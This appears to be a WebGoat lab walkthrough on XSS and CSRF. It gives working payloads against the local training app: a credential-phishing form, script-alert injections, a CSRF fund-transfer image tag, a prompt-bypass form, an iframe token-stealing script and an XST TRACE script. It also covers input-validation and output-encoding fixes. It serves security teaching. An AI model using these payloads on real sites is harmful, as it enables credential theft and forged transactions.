1. Phishing with XSS
</form><form action="http://127.0.0.1:8888/webgoat/catcher?PROPERTY=yes" method="post"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit"/><br><br><HR>

LAB: Cross Site Scripting

  1. Stage 1: Stored XSS

Tom is Jerry's manager and has permission to edit Jerry's profile; neither the input nor the display is filtered in any way.
Alternatively, Tom can edit his own profile and wait for Jerry to view it.

  1. Stage 2: Block Stored XSS using Input Validation

    This stage fixes the Stage 1 problem at the point where the data is written to the database.

    Where users must be allowed to enter input in some supported format, you can use:

    a regular-expression whitelist filter;

    a regular-expression blacklist replacement;

    DOM-based filtering of tags against a whitelist and a blacklist;

    Where only plain text is supported, HTML encoding can be used.

    http://www.2cto.com/Article/201209/156172.html

/**Your code**/
String regex = "[\\s\\w-,]*";
String stringToValidate = firstName+lastName+ssn+title+phone+address1+address2+
startDate+ccn+disciplinaryActionDate+
disciplinaryActionNotes+personalDescription;
Pattern pattern = Pattern.compile(regex);
validate(stringToValidate, pattern);
/**End of your code**/

This validation allows the following:
\s = whitespace: \t\n\x0B\f\r
\w = word characters: a-zA-Z_0-9
and the characters - and ,

Use of any other character will throw a validation exception.
  1. Stage 3: Execute a previously Stored Cross Site Scripting (XSS) attack.

    Bruce's profile contains a stored XSS payload.

  1. Stage 4: Block Stored XSS using Output Encoding.

    Solution:
    You have to use a static method called encode(String s), which is part of the class org.owasp.webgoat.util.HtmlEncoder.
    This method encodes all special characters in the string. Now you have to use this method in the getEmployeeProfile method of the org.owasp.webgoat.lessons.CrossSiteScripting class. Replace every answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done.

  2. Stage 5: Execute a Reflected XSS attack.

    The search input box has a reflected XSS.

  3. Stage 6: Block Reflected XSS using Input Validation.

Solution:
The solution is rather similar to Stage 2. You have to edit org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile.java. Alter the method getRequestParameter. The body of the method should look something like this:

String regex = "[\\s\\w-,]*";
String parameter = s.getParser().getRawParameter(name);
Pattern pattern = Pattern.compile(regex);
validate(parameter, pattern);
return parameter;
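As an added Python example (not code from this page or from WebGoat), the following reimplements the Stage 2 / Stage 6 whitelist check and the Stage 4 output encoding so both layers can be exercised against the payloads used in this lesson; validate, is_valid, html_encode and render_profile_field are names chosen here, and html.escape is used in place of WebGoat's HtmlEncoder.encode.

```python
import html
import re

# Same character whitelist as the Stage 2 / Stage 6 solution: whitespace,
# word characters, '-' and ','. re.ASCII keeps \w and \s ASCII-only, which
# matches Java's default; without it Python's \w also accepts non-ASCII
# letters and the whitelist silently widens.
PROFILE_FIELD_RE = re.compile(r"[\s\w\-,]*", re.ASCII)


class ValidationException(ValueError):
    """Raised when input contains a character outside the whitelist."""


def validate(value: str, pattern: re.Pattern = PROFILE_FIELD_RE) -> str:
    """Whitelist check for a stored profile field or a request parameter.

    fullmatch() corresponds to Java's Matcher.matches(): the entire string
    must fit the pattern. re.match() would anchor only at the start and let
    "Jerry<script>" through because its prefix is valid.
    """
    if pattern.fullmatch(value) is None:
        rejected = sorted({c for c in value if pattern.fullmatch(c) is None})
        raise ValidationException(f"disallowed characters: {rejected!r}")
    return value


def is_valid(value: str) -> bool:
    """Boolean wrapper around validate() for callers that prefer no exception."""
    try:
        validate(value)
    except ValidationException:
        return False
    return True


def html_encode(value: str) -> str:
    """Stage 4 defence: encode at output time. html.escape (standing in for
    HtmlEncoder.encode here) rewrites & < > " and ' as entities."""
    return html.escape(value, quote=True)


def render_profile_field(stored_value: str) -> str:
    """Render one profile cell the way the fixed getEmployeeProfile does:
    encoding is applied even to data that passed input validation, because
    validation added later does not clean rows that were stored before it
    existed (which is exactly what Stage 3 exploits)."""
    return f"<td>{html_encode(stored_value)}</td>"
```

A whitelist this strict also rejects ordinary input such as O'Brien or a period in an address, so in practice the pattern is tuned per field while output encoding stays in place for every field.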
  1. Stored XSS Attacks

    The message body of the sent email has a stored XSS.

  2. Reflected XSS Attacks
QTY1=<script>alert(1)</script>&QTY2=<script>alert(2)</script>&QTY3=<script>alert(3)</script>&QTY4=<script>alert(4)</script>&SUBMIT=UpdateCart&field2=<script>alert(5)</script>&field1=<script>alert(5)</script>

Try every parameter that can be submitted; the last input field works.

  • Congratulations. You have successfully completed this lesson.
  1. Cross Site Request Forgery (CSRF)

Include the following code in the mail message: <img src='attack?Screen=13&menu=900&transferFunds=5000' width="1" height="1" />

  1. CSRF Prompt By-Pass
<form accept-charset='UNKNOWN' method='POST' action='attack?Screen=5&menu=900' enctype='application/x-www-form-urlencoded'>
<input name='transferFunds' type='submit' value='CONFIRM'>
<input name='transferFunds' type='submit' value='CANCEL'>
</form>
  1. CSRF Token By-Pass
<script>
var tokenValue;
function readToken(){
var frameDoc = document.getElementById("iframe1").contentDocument;
var form = frameDoc.getElementsByTagName("form")[1];
console.log(form);
var token = form.CSRFToken.value;
tokenValue = '&CSRFToken='+token;
loadFrame2()
}
function loadFrame2(){
var  Frame2 = document.getElementById("iframe2");
console.log(Frame2);
Frame2.src='http://127.0.0.1:8888/webgoat/attack?Screen=2&menu=900&transferFunds=4000'+tokenValue;
console.log(Frame2.src);
}
</script>
<iframe id="iframe1" src="http://127.0.0.1:8888/webgoat/attack?Screen=2&menu=900&transferFunds=main" onload="readToken()" width="500" height="200" scrolling="yes"></iframe>
<iframe id="iframe2" width="500" height="200" scrolling=yes></iframe>
  1. HTTPOnly Test
  2. SUCCESS: Your browser enforced the HTTPOnly flag properly for the 'unique2u' cookie by preventing direct client side read access to this cookie.
  3. SUCCESS: Your browser enforced the write protection property of the HTTPOnly flag for the 'unique2u' cookie by preventing client side modification.
  4. Cross Site Tracing (XST) Attacks

XST attacks likewise embed malicious code in web files on a host; when a visitor browses the page, the code runs in the browser, and the visitor's cookies, HTTP Basic authentication credentials and NTLM authentication information are sent to a host already under the attacker's control, while a TRACE request is sent to the target host, leading to cookie spoofing or a man-in-the-middle attack.
Conditions for an XST attack:

1. The target web server must allow the TRACE method;

2. A place to insert the XST code is needed;

3. The target site has a cross-domain vulnerability.
Comparison of XST and XSS:

Similarities: both are highly deceptive and can do harm to the host, and the attack is cross-platform; ActiveX controls, Flash, Java and so on can also be used to carry out XST and XSS attacks.

Advantage of XST: it can bypass ordinary HTTP authentication as well as NTLM authentication

<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>"); document.write(str1);}</script>

Exercises on other platforms: